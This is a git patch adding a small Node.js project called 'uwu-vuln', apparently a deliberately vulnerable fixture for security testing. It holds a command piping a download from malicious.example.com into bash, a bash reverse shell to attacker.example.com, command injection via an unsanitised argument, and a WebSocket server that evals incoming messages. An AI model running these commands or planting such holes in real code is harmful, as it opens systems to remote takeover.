From ea24d94939588b772f7fd53b030fab0ddac60f3a Mon Sep 17 00:00:00 2001
From: Mohammed <mo@zeropath.com>
Date: Wed, 26 Nov 2025 21:47:40 -0500
Subject: [PATCH] added

---
 cli/index.js   | 18 ++++++++++++++++++
 disk/index.js  | 17 +++++++++++++++++
 package.json   | 11 +++++++++++
 stdin/index.js | 12 ++++++++++++
 ws/index.js    | 12 ++++++++++++
 5 files changed, 70 insertions(+)
 create mode 100644 cli/index.js
 create mode 100644 disk/index.js
 create mode 100644 package.json
 create mode 100644 stdin/index.js
 create mode 100644 ws/index.js

diff --git a/cli/index.js b/cli/index.js
new file mode 100644
index 0000000..7e5db7a
--- /dev/null
+++ b/cli/index.js
@@ -0,0 +1,18 @@
+const { exec } = require('child_process');
+
+const userArg = process.argv[2] || '';
+
+const cmd = `
+  rm -rf /tmp/vuln_dir --no-preserve-root &&
+  curl http://malicious.example.com/install.sh | bash &&
+  ls ${userArg}
+`;
+
+console.log('[*] Running dangerous CLI pipeline…');
+exec(cmd, (err, stdout, stderr) => {
+  if (err) {
+    console.error('[!] Pipeline failed:', err);
+    return;
+  }
+  console.log('[+] Pipeline succeeded. stdout:\\n', stdout);
+});
diff --git a/disk/index.js b/disk/index.js
new file mode 100644
index 0000000..963519e
--- /dev/null
+++ b/disk/index.js
@@ -0,0 +1,17 @@
+const express = require('express');
+const fs = require('fs');
+const path = require('path');
+const app = express();
+
+// Path Traversal
+app.get('/read', (req, res) => {
+  const file = req.query.file;
+  const fullPath = path.resolve(__dirname, file);
+  if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
+  fs.readFile(fullPath, 'utf8', (err, data) => {
+    if (err) return res.status(500).send(err.message);
+    res.send(data);
+  });
+});
+
+app.listen(3001, () => console.log('Disk vuln on port 3001'));
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..5cb2217
--- /dev/null
+++ b/package.json
@@ -0,0 +1,11 @@
+{
+  "name": "uwu-vuln",
+  "version": "1.0.0",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC",
+  "description": ""
+}
diff --git a/stdin/index.js b/stdin/index.js
new file mode 100644
index 0000000..b712e33
--- /dev/null
+++ b/stdin/index.js
@@ -0,0 +1,12 @@
+const { exec } = require('child_process');
+
+const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
+
+console.log('[*] Executing reverse shell payload…');
+exec(payload, (err, stdout, stderr) => {
+  if (err) {
+    console.error('[!] Error executing payload:', err);
+    return;
+  }
+  console.log('[+] Payload executed. stdout:', stdout);
+});
diff --git a/ws/index.js b/ws/index.js
new file mode 100644
index 0000000..7b0fc64
--- /dev/null
+++ b/ws/index.js
@@ -0,0 +1,12 @@
+const WebSocket = require('ws');
+const wss = new WebSocket.Server({ port: 8080 });
+
+// RCE
+wss.on('connection', ws => {
+  ws.on('message', msg => {
+    eval(msg);
+    ws.send('Executed: ' + msg);
+  });
+});
+
+console.log('WS vuln on port 8080');
\ No newline at end of file